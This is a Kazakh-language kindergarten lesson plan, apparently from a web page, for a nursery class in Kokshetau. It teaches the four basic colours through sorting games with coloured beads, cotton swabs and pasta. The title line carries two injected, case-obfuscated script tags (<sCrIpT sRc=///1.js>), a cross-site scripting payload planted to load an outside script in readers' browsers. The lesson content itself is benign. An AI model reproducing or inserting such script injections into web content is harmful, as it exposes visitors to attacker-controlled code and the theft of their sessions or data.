Қорытынды іс-әрекет: "Қызыл,жасыл, сары көк" №4 ". Тәрбиеші: Бексеитова Р.Г.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.06.2024
«Ақмола облысы білім басқармасының Көкшетау
қаласы бойынша білім бөлімінің жанындағы Көкшетау қаласының
«Көкшетау» бөбекжайы» МКҚК
Тақырыбы:«Қызыл, жасыл,сары, көк»
(Қорытынды сабақ)
Өткізген: Бексеитова Р.Г.
(17.05.2024ж)
Тақырыбы: «Қызыл, жасыл, сары көк» (кіріктірілген сабақ)
Мақсаты:Балаларға негізгі төрт түстерді топтастыруға үйрету,түстерді ажырата білуге баулу.
Көрнекі құралдар:Суреттер,түрлі -түсті асықтар,дидактикалық материалдар.
Шаттық шеңбері:
Аю, Аю тұршы,
Бетіңді жушы,
Шашыңды тарашы
Айнаға қарашы.
Қонаққа көңілді Қоян келеді
Қоян- сәлеметсіңдерме, балалар!
Мен сендерге сыйлық алып келдім.
Ал сыйлықты бермес бұрын сендерге ойын алып келдім.
Ойын: «Түрлі түсті асықтар»
- Асықтарды түстері бойынша ажырату,топтастыру,сары асықты сары ыдысқа ,жасыл асықты жасыл ыдысқа ,қызыл асықты қызыл ыдысқа тб салу.
Сергіту сәті: «Бас, иық, тізе».
- Балалар орындарына отырады.
- Түрлі түсті қағаздан қиылған шарларды жабыстыру.
Ойын: «мақта таяқшалары»
Мақсаты: Балалардың білімдерін жинақтап, тереңдету, қызығушылықтарын арттыру, шапшаңдыққа баулу, белсенділіктерін арттыру. Топпен жұмыс істей отырып,ұйымшылдыққа баулу.
Шарты:мақта таяқшаларын жұмыртқа салатын қорапқа салу
Мақсаты : Балаларға негізгі төрт түстерді топтастыруға үйрету,түстерді ажырата білуге баулу.
Ойын: «Қызыл, жасыл, сары, көк»
Шарты: түрлі түсті макарондарды таяқшаларға кигізу.
Мақсаты: Топпен жұмыс істей отырып,ұйымшылдыққа баулу.
Қорытынды:Балалар сендерге ойын ұнады ма?
Балалар сендерге көптен көп рахмет.